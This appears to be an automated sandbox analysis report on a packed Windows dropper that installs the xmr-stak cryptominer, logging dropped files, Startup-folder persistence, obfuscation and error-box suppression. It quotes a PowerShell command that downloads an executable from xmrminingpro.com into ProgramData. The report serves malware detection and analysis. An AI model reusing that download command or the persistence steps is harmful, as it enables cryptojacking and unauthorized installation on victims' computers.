File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6097296

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00492495 push ecx; ret	6_2_004924A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0045D7CC push esp; iretd	6_2_0045D7CD
Source: C:\ProgramData\playersclub\LaunchServ.exe	Code function: 12_2_00405D30 push eax; ret	12_2_00405D5E

Sample is packed with UPX

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'			Jump to behavior

Drops PE files

Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\Process.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\xmr-stak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\player.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\cudart64_80.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libwinpthread-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	File created: C:\ProgramData\qswGutmnEr\Silent.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_cuda_backend.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\installer.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_opencl_backend.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\zlib1.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\player.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libcurl-4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libiconv-2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\ssleay32.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\paexec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\cudart64_80.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\ssleay32.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\Silent.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\runProcesses.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmr-stak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libeay32.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcp140.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libiconv-2.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\Win.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libintl-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\xmrstak_opencl_backend.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libcurl-4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\msvcp140.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libeay32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\paexec.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\systemSpawn.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\pthreadVC2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\LaunchServ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libidn-11.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\xmrstak_cuda_backend.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libintl-8.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libidn-11.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libwinpthread-1.dll	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\systemSpawn.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\runProcesses.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\pthreadVC2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\Process.exe	Jump to dropped file
Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\LaunchServ.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\Win.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\xmr-stak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\xmrstak_opencl_backend.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libcurl-4.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\player.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\paexec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	File created: C:\ProgramData\qswGutmnEr\Silent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\LaunchServ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libidn-11.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\xmrstak_cuda_backend.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libintl-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libiconv-2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libwinpthread-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\zlib1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\cudart64_80.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\systemSpawn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\libeay32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\runProcesses.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\pthreadVC2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\Process.exe	Jump to dropped file

Creates license or readme file

Source: C:\ProgramData\Win.exe	File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	File created: C:\ProgramData\playersclub\readme.txt			Jump to behavior

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\ProgramData\Win.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat.lnk

Stores files to the Windows start menu directory

Source: C:\ProgramData\Win.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat.lnk			Jump to behavior
Source: C:\ProgramData\Win.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win_service.lnk			Jump to behavior

Contains functionality to start windows services

Source: C:\ProgramData\playersclub\LaunchServ.exe

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00478000 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,	6_2_00478000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00478130 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,	6_2_00478130
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004373F0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,GetModuleHandleW,GetProcAddress,	6_2_004373F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00451490 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,	6_2_00451490
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0045E580 MulDiv,MulDiv,MulDiv,_wcschr,__wcsicoll,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,_wcschr,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,MulDiv,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetWindowLongW,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,CreateWindowExW,CreateWindowExW,CreateWindowExW,CreateWindowExW,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,CreateWindowExW,CreateWindowExW,SendMessageW,SendMessageW,MulDiv,MulDiv,MulDiv,MoveWindow,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,S	6_2_0045E580
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0043B6E0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,EnumChildWindows,GetClassNameW,EnumChildWindows,	6_2_0043B6E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00461740 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsicoll,__wcsicoll,__wcsicoll,MulDiv,MulDiv,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,	6_2_00461740
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0043A840 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,	6_2_0043A840
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00438890 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,	6_2_00438890
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00475920 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	6_2_00475920
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00475980 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	6_2_00475980
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00464AC0 SetWindowTextW,IsZoomed,IsIconic,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,	6_2_00464AC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00464AC0 SetWindowTextW,IsZoomed,IsIconic,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,	6_2_00464AC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00468B40 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,	6_2_00468B40

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\notepad.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Process information set: NOOPENFILEERRORBOX
